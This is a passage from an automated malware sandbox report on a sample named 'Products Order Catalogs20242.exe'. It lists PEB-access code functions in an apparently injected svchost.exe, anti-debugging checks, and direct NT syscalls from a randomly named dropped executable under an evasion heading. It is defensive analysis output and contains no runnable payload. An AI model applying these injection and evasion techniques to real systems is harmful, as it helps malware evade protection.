            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]1_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]1_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]1_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]1_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]1_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]1_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]1_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]1_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]1_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]1_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]1_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]1_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]1_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]1_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]1_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]1_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]1_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]1_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]1_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]1_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]1_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]1_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]1_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]1_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
